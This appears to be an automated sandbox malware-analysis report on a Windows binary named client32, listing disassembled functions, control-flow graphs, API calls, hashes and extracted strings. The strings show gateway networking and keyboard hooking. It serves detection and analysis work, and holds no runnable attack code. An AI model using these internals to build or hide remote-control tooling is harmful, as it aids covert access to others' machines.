                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                • String ID: $18/11/16 11:28:14 V12.10F20$301389$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                                                • API String ID: 1029625771-1370904398
                                                                                                                                                                                • Opcode ID: 2e5cf7256a4ce086a2281db76e73e4f2e391432ea9a0dcf92cae79295953a257
                                                                                                                                                                                • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e5cf7256a4ce086a2281db76e73e4f2e391432ea9a0dcf92cae79295953a257
                                                                                                                                                                                • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51
                                                                                                                                                                                Function 6C6063C0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181libraryloadersleepCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2452 6c6063c0-6c606402 call 6c624710 EnterCriticalSection InterlockedDecrement 2455 6c606408-6c60641f EnterCriticalSection 2452->2455 2456 6c6065ed-6c606608 LeaveCriticalSection call 6c6228e1 2452->2456 2458 6c606425-6c606431 2455->2458 2459 6c6064da-6c6064e0 2455->2459 2463 6c606443-6c606447 2458->2463 2464 6c606433-6c606441 GetProcAddress 2458->2464 2460 6c6064e6-6c6064f0 shutdown 2459->2460 2461 6c6065bd-6c6065e8 call 6c621c50 LeaveCriticalSection 2459->2461 2467 6c6064f2-6c606507 GetLastError call 6c6030a0 2460->2467 2468 6c60650a-6c60652d timeGetTime #16 2460->2468 2461->2456 2465 6c606449-6c60644c 2463->2465 2466 6c60644e-6c606450 SetLastError 2463->2466 2464->2463 2470 6c606456-6c606465 2465->2470 2466->2470 2467->2468 2472 6c60656c-6c60656e 2468->2472 2473 6c60652f 2468->2473 2476 6c606477-6c60647b 2470->2476 2477 6c606467-6c606475 GetProcAddress 2470->2477 2481 6c606570-6c60657b closesocket 2472->2481 2479 6c606551-6c60656a #16 2473->2479 2480 6c606531 2473->2480 2484 6c606482-6c606484 SetLastError 2476->2484 2485 6c60647d-6c606480 2476->2485 2477->2476 2479->2472 2479->2473 2480->2479 2486 6c606533-6c60653e GetLastError 2480->2486 2482 6c6065b6 2481->2482 2483 6c60657d-6c60658a WSAGetLastError 2481->2483 2482->2461 2487 6c606594-6c606598 2483->2487 2488 6c60658c-6c60658e Sleep 2483->2488 2489 6c60648a-6c606499 2484->2489 2485->2489 2486->2472 2490 6c606540-6c606547 timeGetTime 2486->2490 2487->2481 2491 6c60659a-6c60659c 2487->2491 2488->2487 2493 6c6064ab-6c6064af 2489->2493 2494 6c60649b-6c6064a9 GetProcAddress 2489->2494 2490->2472 2495 6c606549-6c60654b Sleep 2490->2495 2491->2482 2496 6c60659e-6c6065b3 GetLastError call 6c6030a0 2491->2496 2497 6c6064b1-6c6064be 2493->2497 2498 6c6064c3-6c6064d5 SetLastError 2493->2498 2494->2493 2495->2479 2496->2482 2497->2461 2498->2461
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(6C64B898,00000000,?,00000000,?,6C60D77B,00000000), ref: 6C6063E8
                                                                                                                                                                                • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6C6063FA
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6C60D77B,00000000), ref: 6C606412
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C60643B
                                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,00000000,?,6C60D77B,00000000), ref: 6C606450
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C60646F
                                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,00000000,?,6C60D77B,00000000), ref: 6C606484
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C6064A3
                                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,00000000,?,6C60D77B,00000000), ref: 6C6064C5
                                                                                                                                                                                • shutdown.WSOCK32(?,00000001,?,00000000,?,6C60D77B,00000000), ref: 6C6064E9
                                                                                                                                                                                • GetLastError.KERNEL32(?,00000001,?,00000000,?,6C60D77B,00000000), ref: 6C6064F2
                                                                                                                                                                                • timeGetTime.WINMM(?,00000001,?,00000000,?,6C60D77B,00000000), ref: 6C606510
                                                                                                                                                                                • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6C60D77B,00000000), ref: 6C606526
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6C60D77B,00000000), ref: 6C606533
                                                                                                                                                                                • timeGetTime.WINMM(?,00000000,?,6C60D77B,00000000), ref: 6C606540
                                                                                                                                                                                • Sleep.KERNEL32(00000001,?,00000000,?,6C60D77B,00000000), ref: 6C60654B
                                                                                                                                                                                • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6C60D77B,00000000), ref: 6C606563
                                                                                                                                                                                • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C60D77B,00000000), ref: 6C606574
                                                                                                                                                                                • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6C60D77B,00000000), ref: 6C60657D
                                                                                                                                                                                • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6C60D77B,00000000), ref: 6C60658E
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6C60D77B,00000000), ref: 6C60659E
                                                                                                                                                                                • _memset.LIBCMT ref: 6C6065C8
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,6C60D77B,00000000), ref: 6C6065D7
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6C64B898,?,00000000,?,6C60D77B,00000000), ref: 6C6065F2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                                                                                                                • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                                                                                                                • API String ID: 3764039262-2631155478
                                                                                                                                                                                • Opcode ID: c73a4107ce16cf0e83853c9023716c9a9383d9e6937dab09f11fb5d0068d36ba
                                                                                                                                                                                • Instruction ID: 5019d23c387d1aaf3485102a004ac0bd0b1249ab0d0097efba5c9eae09278ff1
                                                                                                                                                                                • Opcode Fuzzy Hash: c73a4107ce16cf0e83853c9023716c9a9383d9e6937dab09f11fb5d0068d36ba
                                                                                                                                                                                • Instruction Fuzzy Hash: A251D171704300AFD714EF65C984B9673B8AF59719F20C514E90AE7A80DBB4E884CF6C
                                                                                                                                                                                Function 6C6098D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2502 6c6098d0-6c609932 2503 6c609934-6c609955 call 6c6030a0 call 6c6228e1 2502->2503 2504 6c609956-6c60995e 2502->2504 2506 6c609964-6c609979 _strncmp 2504->2506 2507 6c609ac5-6c609acc 2504->2507 2506->2507 2509 6c60997f-6c609994 call 6c624330 2506->2509 2510 6c609b19-6c609b1d 2507->2510 2511 6c609ace-6c609adb 2507->2511 2509->2507 2528 6c60999a-6c6099af _strncmp 2509->2528 2516 6c609b4b-6c609b70 GetTickCount InterlockedExchange EnterCriticalSection 2510->2516 2517 6c609b1f-6c609b26 2510->2517 2514 6c609af8-6c609b07 wsprintfA 2511->2514 2515 6c609add-6c609af6 wsprintfA 2511->2515 2522 6c609b0a-6c609b16 call 6c6052b0 2514->2522 2515->2522 2519 6c609b72-6c609b9b LeaveCriticalSection call 6c6030a0 call 6c6228e1 2516->2519 2520 6c609b9c-6c609ba1 2516->2520 2517->2516 2523 6c609b28-6c609b41 call 6c6077b0 2517->2523 2526 6c609ba3-6c609bd0 call 6c604dd0 2520->2526 2527 6c609bfb-6c609c05 2520->2527 2522->2510 2523->2516 2537 6c609b43-6c609b45 2523->2537 2549 6c609bd6-6c609bf6 WSAGetLastError call 6c6030a0 2526->2549 2550 6c609d4b-6c609d6c LeaveCriticalSection call 6c6177e0 2526->2550 2531 6c609c07-6c609c17 2527->2531 2532 6c609c3b-6c609c47 2527->2532 2528->2507 2535 6c6099b5-6c6099f1 2528->2535 2538 6c609c20-6c609c22 2531->2538 2539 6c609c19-6c609c1d 2531->2539 2541 6c609c50-6c609c5a 2532->2541 2543 6c6099f7-6c6099ff 2535->2543 2537->2516 2538->2532 2547 6c609c24-6c609c36 call 6c6046c0 2538->2547 2539->2538 2546 6c609c1f 2539->2546 2544 6c609c60-6c609c65 2541->2544 2545 6c609d2e-6c609d3b call 6c6030a0 2541->2545 2551 6c609aa3-6c609ac2 call 6c6030a0 2543->2551 2552 6c609a05-6c609a08 2543->2552 2553 6c609c71-6c609c9a send 2544->2553 2554 6c609c67-6c609c6b 2544->2554 2574 6c609d45 2545->2574 2546->2538 2547->2532 2549->2550 2575 6c609d78-6c609d8a call 6c6228e1 2550->2575 2576 6c609d6e-6c609d72 InterlockedIncrement 2550->2576 2551->2507 2560 6c609a0a-6c609a0c 2552->2560 2561 6c609a0e 2552->2561 2563 6c609cf1-6c609d0f call 6c6030a0 2553->2563 2564 6c609c9c-6c609c9f 2553->2564 2554->2545 2554->2553 2562 6c609a14-6c609a1d 2560->2562 2561->2562 2569 6c609a8d-6c609a8e 2562->2569 2570 6c609a1f-6c609a22 2562->2570 2563->2574 2572 6c609ca1-6c609cac 2564->2572 2573 6c609cbe-6c609cce WSAGetLastError 2564->2573 2569->2551 2579 6c609a24 2570->2579 2580 6c609a26-6c609a35 2570->2580 2572->2574 2582 6c609cb2-6c609cbc 2572->2582 2577 6c609cd0-6c609ce9 timeGetTime Sleep 2573->2577 2578 6c609d11-6c609d2c call 6c6030a0 2573->2578 2574->2550 2576->2575 2577->2541 2587 6c609cef 2577->2587 2578->2574 2579->2580 2584 6c609a90-6c609a93 2580->2584 2585 6c609a37-6c609a3a 2580->2585 2582->2577 2589 6c609a9d 2584->2589 2590 6c609a3c 2585->2590 2591 6c609a3e-6c609a4d 2585->2591 2587->2574 2589->2551 2590->2591 2593 6c609a95-6c609a98 2591->2593 2594 6c609a4f-6c609a52 2591->2594 2593->2589 2595 6c609a54 2594->2595 2596 6c609a56-6c609a65 2594->2596 2595->2596 2597 6c609a67-6c609a6a 2596->2597 2598 6c609a9a 2596->2598 2599 6c609a6c 2597->2599 2600 6c609a6e-6c609a85 2597->2600 2598->2589 2599->2600 2600->2543 2601 6c609a8b 2600->2601 2601->2551
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strncmp
                                                                                                                                                                                • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                                                                                                                • API String ID: 909875538-2848211065
                                                                                                                                                                                • Opcode ID: b6299c9b4a54319f3fe10976f4b9aac5ed1f1cf945b0a8942e22e37e6c780454
                                                                                                                                                                                • Instruction ID: 3d517033b35c8f9323c1f92a1714fd076fb7759f5fa18d09d3e854dda76f5bfd
                                                                                                                                                                                • Opcode Fuzzy Hash: b6299c9b4a54319f3fe10976f4b9aac5ed1f1cf945b0a8942e22e37e6c780454
                                                                                                                                                                                • Instruction Fuzzy Hash: C5D10171B052149FDB28DF64C981BDAB7B6AF0A30CF0481D9E80DAB641D731D988CF99
                                                                                                                                                                                Function 11142010 Relevance: 45.8, APIs: 12, Strings: 14, Instructions: 266libraryregistryloaderCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2602 11142010-11142051 call 11147060 2605 11142057-111420b3 LoadLibraryA 2602->2605 2606 111420d9-11142103 call 11143a50 call 11147af0 LoadLibraryA 2602->2606 2607 111420b5-111420c0 call 11017a40 2605->2607 2608 111420c7-111420d0 2605->2608 2617 11142105-1114210b 2606->2617 2618 11142133 2606->2618 2607->2608 2616 111420c2 call 110ccc90 2607->2616 2608->2606 2611 111420d2-111420d3 FreeLibrary 2608->2611 2611->2606 2616->2608 2617->2618 2620 1114210d-11142113 2617->2620 2621 1114213d-1114215d GetClassInfoExA 2618->2621 2620->2618 2622 11142115-11142131 call 1105e820 2620->2622 2623 11142163-1114218a call 11162be0 call 11145080 2621->2623 2624 111421fe-11142256 2621->2624 2622->2621 2633 111421a3-111421e5 call 11145080 call 111450b0 LoadCursorA GetStockObject RegisterClassExA 2623->2633 2634 1114218c-111421a0 call 11029a70 2623->2634 2635 11142292-11142298 2624->2635 2636 11142258-1114225e 2624->2636 2633->2624 2660 111421e7-111421fb call 11029a70 2633->2660 2634->2633 2638 111422d4-111422f6 call 1105e820 2635->2638 2639 1114229a-111422a9 call 111101b0 2635->2639 2636->2635 2641 11142260-11142266 2636->2641 2655 11142304-11142309 2638->2655 2656 111422f8-11142302 2638->2656 2653 111422cd 2639->2653 2654 111422ab-111422cb 2639->2654 2641->2635 2643 11142268-1114227f call 1112d770 LoadLibraryA 2641->2643 2643->2635 2659 11142281-1114228d GetProcAddress 2643->2659 2661 111422cf 2653->2661 2654->2661 2657 11142315-1114231b 2655->2657 2658 1114230b 2655->2658 2656->2657 2662 1114231d-11142323 call 110f8230 2657->2662 2663 11142328-11142341 call 1113d9a0 2657->2663 2658->2657 2659->2635 2660->2624 2661->2638 2662->2663 2670 11142347-1114234d 2663->2670 2671 111423e9-111423fa 2663->2671 2672 1114234f-11142361 call 111101b0 2670->2672 2673 11142389-1114238f 2670->2673 2684 11142363-11142379 call 1115e590 2672->2684 2685 1114237b 2672->2685 2674 111423b5-111423c1 2673->2674 2675 11142391-11142397 2673->2675 2679 111423c3-111423c9 2674->2679 2680 111423d8-111423e3 #17 LoadLibraryA 2674->2680 2677 1114239e-111423b0 SetTimer 2675->2677 2678 11142399 call 11135840 2675->2678 2677->2674 2678->2677 2679->2680 2683 111423cb-111423d1 2679->2683 2680->2671 2683->2680 2687 111423d3 call 1112e5e0 2683->2687 2686 1114237d-11142384 2684->2686 2685->2686 2686->2673 2687->2680
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(User32.dll,00000000,?), ref: 11142063
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                                                                                                                                • LoadLibraryA.KERNEL32(imm32,?,?,00000000,?), ref: 111420F6
                                                                                                                                                                                • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 111421B9
                                                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                                                                                                                                • RegisterClassExA.USER32(?), ref: 111421DA
                                                                                                                                                                                • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,?), ref: 11142272
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11142287
                                                                                                                                                                                • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                                                                                                                                • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                                                                                                                                • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,?), ref: 111423E3
                                                                                                                                                                                  • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,2520CF5D), ref: 11017A6E
                                                                                                                                                                                  • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                                                                                                                  • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                                                                                                                  • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                                                                                                                  • Part of subcall function 110CCC90: CreateWindowExA.USER32(00000000,button,11195264,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CCCC9
                                                                                                                                                                                  • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow
                                                                                                                                                                                • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                                                                                                • API String ID: 2680930358-3145203681
                                                                                                                                                                                • Opcode ID: bcf8955f203f6aa6b0fe58f537dffc706661812fe61d8ca9e9a493d739193c53
                                                                                                                                                                                • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                                                                                                                                • Opcode Fuzzy Hash: bcf8955f203f6aa6b0fe58f537dffc706661812fe61d8ca9e9a493d739193c53
                                                                                                                                                                                • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55
                                                                                                                                                                                Function 11028C10 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2691 11028c10-11028c2d 2692 11028c33-11028c62 2691->2692 2693 110292f8-110292ff 2691->2693 2696 11028cf0-11028d38 GetModuleFileNameA call 111640b0 call 11164ead 2692->2696 2697 11028c68-11028c6e 2692->2697 2694 11029311-11029315 2693->2694 2695 11029301-1102930a 2693->2695 2699 11029317-11029329 call 11162bb7 2694->2699 2700 1102932a-1102933e call 11162bb7 2694->2700 2695->2694 2698 1102930c 2695->2698 2712 11028d3d 2696->2712 2702 11028c70-11028c78 2697->2702 2698->2694 2702->2702 2703 11028c7a-11028c80 2702->2703 2707 11028c83-11028c88 2703->2707 2707->2707 2711 11028c8a-11028c94 2707->2711 2714 11028cb1-11028cb7 2711->2714 2715 11028c96-11028c9d 2711->2715 2713 11028d40-11028d4a 2712->2713 2716 11028d50-11028d53 2713->2716 2717 110292ef-110292f7 2713->2717 2719 11028cb8-11028cbe 2714->2719 2718 11028ca0-11028ca6 2715->2718 2716->2717 2720 11028d59-11028d67 call 11026ef0 2716->2720 2717->2693 2718->2718 2721 11028ca8-11028cae 2718->2721 2719->2719 2722 11028cc0-11028cee call 11164ead 2719->2722 2727 11029275-1102928a call 11164c77 2720->2727 2728 11028d6d-11028d80 call 11163ca7 2720->2728 2721->2714 2722->2713 2727->2717 2735 11029290-110292ea 2727->2735 2733 11028d82-11028d85 2728->2733 2734 11028d8b-11028db3 call 11026d60 call 11026ef0 2728->2734 2733->2727 2733->2734 2734->2727 2740 11028db9-11028dd6 call 11026fe0 call 11026ef0 2734->2740 2735->2717 2745 110291e5-110291ec 2740->2745 2746 11028ddc 2740->2746 2748 11029212-11029219 2745->2748 2749 110291ee-110291f1 2745->2749 2747 11028de0-11028e00 call 11026d60 2746->2747 2759 11028e02-11028e05 2747->2759 2760 11028e36-11028e39 2747->2760 2751 11029231-11029238 2748->2751 2752 1102921b-11029221 2748->2752 2749->2748 2750 110291f3-110291fa 2749->2750 2754 11029200-11029210 2750->2754 2756 1102923a-11029245 2751->2756 2757 11029248-1102924f 2751->2757 2755 11029227-1102922f 2752->2755 2754->2748 2754->2754 2755->2751 2755->2755 2756->2757 2761 11029251-1102925b 2757->2761 2762 1102925e-11029265 2757->2762 2763 11028e07-11028e0e 2759->2763 2764 11028e1e-11028e21 2759->2764 2766 110291ce-110291df call 11026ef0 2760->2766 2767 11028e3f-11028e52 call 11165010 2760->2767 2761->2762 2762->2727 2765 11029267-11029272 2762->2765 2768 11028e14-11028e1c 2763->2768 2764->2766 2769 11028e27-11028e31 2764->2769 2765->2727 2766->2745 2766->2747 2767->2766 2774 11028e58-11028e74 call 1116558e 2767->2774 2768->2764 2768->2768 2769->2766 2777 11028e76-11028e7c 2774->2777 2778 11028e8f-11028ea5 call 1116558e 2774->2778 2779 11028e80-11028e88 2777->2779 2783 11028ea7-11028ead 2778->2783 2784 11028ebf-11028ed5 call 1116558e 2778->2784 2779->2779 2781 11028e8a 2779->2781 2781->2766 2785 11028eb0-11028eb8 2783->2785 2789 11028ed7-11028edd 2784->2789 2790 11028eef-11028f05 call 1116558e 2784->2790 2785->2785 2787 11028eba 2785->2787 2787->2766 2791 11028ee0-11028ee8 2789->2791 2795 11028f07-11028f0d 2790->2795 2796 11028f1f-11028f35 call 1116558e 2790->2796 2791->2791 2793 11028eea 2791->2793 2793->2766 2797 11028f10-11028f18 2795->2797 2801 11028f37-11028f3d 2796->2801 2802 11028f4f-11028f65 call 1116558e 2796->2802 2797->2797 2799 11028f1a 2797->2799 2799->2766 2803 11028f40-11028f48 2801->2803 2807 11028f67-11028f6d 2802->2807 2808 11028f7f-11028f95 call 1116558e 2802->2808 2803->2803 2806 11028f4a 2803->2806 2806->2766 2809 11028f70-11028f78 2807->2809 2813 11028f97-11028f9d 2808->2813 2814 11028faf-11028fc5 call 1116558e 2808->2814 2809->2809 2811 11028f7a 2809->2811 2811->2766 2815 11028fa0-11028fa8 2813->2815 2819 11028fc7-11028fcd 2814->2819 2820 11028fdf-11028ff5 call 1116558e 2814->2820 2815->2815 2817 11028faa 2815->2817 2817->2766 2822 11028fd0-11028fd8 2819->2822 2825 11028ff7-11028ffd 2820->2825 2826 1102900f-11029025 call 1116558e 2820->2826 2822->2822 2824 11028fda 2822->2824 2824->2766 2827 11029000-11029008 2825->2827 2831 11029027-1102902d 2826->2831 2832 1102903f-11029055 call 1116558e 2826->2832 2827->2827 2829 1102900a 2827->2829 2829->2766 2833 11029030-11029038 2831->2833 2837 11029057-1102905d 2832->2837 2838 1102906f-11029085 call 1116558e 2832->2838 2833->2833 2835 1102903a 2833->2835 2835->2766 2839 11029060-11029068 2837->2839 2843 110290a6-110290bc call 1116558e 2838->2843 2844 11029087-1102908d 2838->2844 2839->2839 2841 1102906a 2839->2841 2841->2766 2849 110290d3-110290e9 call 1116558e 2843->2849 2850 110290be 2843->2850 2845 11029097-1102909f 2844->2845 2845->2845 2847 110290a1 2845->2847 2847->2766 2855 11029100-11029116 call 1116558e 2849->2855 2856 110290eb 2849->2856 2851 110290c4-110290cc 2850->2851 2851->2851 2854 110290ce 2851->2854 2854->2766 2861 11029137-1102914d call 1116558e 2855->2861 2862 11029118-1102911e 2855->2862 2857 110290f1-110290f9 2856->2857 2857->2857 2859 110290fb 2857->2859 2859->2766 2867 1102916f-11029185 call 1116558e 2861->2867 2868 1102914f-1102915f 2861->2868 2863 11029128-11029130 2862->2863 2863->2863 2865 11029132 2863->2865 2865->2766 2873 11029187-1102918d 2867->2873 2874 1102919c-110291b2 call 1116558e 2867->2874 2870 11029160-11029168 2868->2870 2870->2870 2872 1102916a 2870->2872 2872->2766 2875 11029190-11029198 2873->2875 2874->2766 2879 110291b4-110291ba 2874->2879 2875->2875 2877 1102919a 2875->2877 2877->2766 2880 110291c4-110291cc 2879->2880 2880->2766 2880->2880
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73AC1370,?,0000001A), ref: 11028CFD
                                                                                                                                                                                • _strrchr.LIBCMT ref: 11028D0C
